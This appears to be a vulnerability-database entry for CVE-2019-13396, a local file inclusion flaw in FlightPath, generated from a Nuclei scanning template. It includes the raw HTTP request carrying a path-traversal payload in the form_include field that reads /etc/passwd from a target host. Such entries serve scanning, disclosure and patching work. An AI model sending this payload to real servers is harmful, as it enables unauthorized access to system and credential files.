| Title | FlightPath - Local File Inclusion |
|---|---|
| Author | 0x_Akoko,daffainfo |
| Severity | Medium |
| Impact | This vulnerability can lead to unauthorized access, data leakage, and remote code execution. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 5.3 |
| EPSS Score | 0.66535 |
| CVE ID | CVE-2019-13396 |
| CWE ID | CWE-22 |
| Tags | cve cve2019 flightpath lfi edb getflightpath vuln |
FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
GET /login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.4
Connection: close
Accept-Encoding: gzip
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 95
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
callback=system_login_form&form_token=cjo9jk&form_include=../../../../../../../../../etc/passwd
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-13396.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-13396.pcap
N/AN/A